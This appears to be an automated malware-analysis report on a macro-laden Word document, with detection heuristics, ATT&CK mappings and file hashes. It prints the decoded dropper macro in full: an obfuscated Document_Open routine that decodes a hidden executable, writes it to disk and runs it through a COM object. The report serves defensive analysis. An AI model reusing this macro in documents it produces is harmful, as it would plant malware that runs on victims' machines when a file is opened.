Verdict: MALICIOUS
Risk Score: 262

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1071.001 Web Protocols
- T1105 Ingress Tool Transfer
The sample contains a malicious VBA macro that runs as soon as the document is opened. The macro is obfuscated: it hex-decodes an executable stored in a form-control caption, writes it to disk in the 'c:\may\' directory under a random seven-letter name with a '.exe' extension, and then hands the file to a COM object instantiated via GetObject, which opens it. This is consistent with downloader or dropper functionality.
Heuristics (7)

- ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.HexEncodedEXEHeader-9789587-1
- VBA project inside OOXML (medium, OOXML_VBA, 4 related findings): Document contains a VBA project; VBA macros present
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following were found in document text (OOXML body / shared strings):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1920 bytes | 8823726413b62b459df09e4dd2d19a913bf3c27d43ca26badd6326d21362370c |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 15872 bytes | 7d8e51695f3f776eed1bbd8591fcf88bf2249ebd4084d2818462570106328237 |

Preview of macros.bas (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "DocumentosTittle"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CheckBox1, 0, 0, MSForms, CheckBox"
Private Sub Document_Open()
Dim i, d
Dim strTemp$, strReturn$, hextostr$
Dim Splits$(), CurFolder$
Dim GenerateFileName$, sFile$, sValues$
Splits$ = Split("c:\may", "\")
For i = LBound(Splits) To UBound(Splits)
CurFolder = CurFolder + Splits(i) + "\"
If Dir(CurFolder, vbDirectory) = "" Then MkDir CurFolder
Next i
hextostr = DocumentosTittle.CheckBox1.Caption
For i = 1 To Len(hextostr) Step 2
strTemp = Chr(Val("&H" + Mid(hextostr, i, 2)))
strReturn = strReturn + strTemp
Next i
hextostr = Right(strReturn, Len(strReturn) - 1)
Randomize
sValues = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
sValues = sValues & UCase(sValues) & ""
For i = 1 To Val("7")
GenerateFileName = GenerateFileName & Mid(sValues, Int(Rnd() * Len(sValues) + 1), 1)
Next i
sFile = GenerateFileName
d = Chr$(99) + Chr$(58) + Chr$(92) + Chr$(109) + Chr$(97) + Chr$(121) + Chr$(92) + sFile + Chr$(46) + Chr$(101) + Chr$(120) + Chr$(101)
Open d For Binary As #1
Put #1, , Chr$(77) + hextostr + sFile
Close #1
Dim obj3
Set obj3 = GetObject(ChrW(110) + ChrW(101) + ChrW(119) + ChrW(58) + ChrW(49) + ChrW(51) + ChrW(55) + ChrW(48) _
+ ChrW(57) + ChrW(54) + ChrW(50) + ChrW(48) + ChrW(45) + ChrW(67) + ChrW(50) + ChrW(55) + ChrW(57) _
+ ChrW(45) + ChrW(49) + ChrW(49) + ChrW(67) + ChrW(69) + ChrW(45) + ChrW(65) + ChrW(52) + ChrW(57) _
+ ChrW(69) + ChrW(45) + ChrW(52) + ChrW(52) + ChrW(52) + ChrW(53) + ChrW(53) + ChrW(51) + ChrW(53) _
+ ChrW(52) + ChrW(48) + ChrW(48) + ChrW(48) + ChrW(48))
obj3.Open d
End Sub
```